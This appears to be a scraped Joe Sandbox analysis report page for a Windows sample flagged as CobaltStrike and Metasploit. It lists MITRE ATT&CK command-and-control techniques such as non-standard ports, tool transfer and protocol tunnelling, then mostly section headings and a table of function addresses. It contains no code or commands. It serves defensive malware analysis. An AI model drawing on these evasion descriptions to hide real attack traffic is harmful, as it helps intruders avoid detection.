Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report THsSNYblMw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Threatname: Metasploit

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
THsSNYblMw.exe

Function 006AE3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152
networkfileCOMMONLIBRARYCODE

Function 00401180 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 205
sleepstringCOMMON

Function 006B4578 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Function 006A1184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Function 00401630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
pipefileCOMMON

Function 0040DF90 Relevance: 6.2, APIs: 4, Instructions: 163
librarymemoryloaderCOMMON

Function 004017F8 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 54
threadCOMMON

Function 006ACA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268
COMMONLIBRARYCODE

Function 00401704 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
fileCOMMON

Function 001B0128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87
memoryfilenetworkCOMMON

Function 006AEC4C Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Function 004024E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Function 001B0192 Relevance: 3.2, APIs: 2, Instructions: 207
COMMON

Function 001B0287 Relevance: 3.1, APIs: 2, Instructions: 92
memoryfilenetworkCOMMON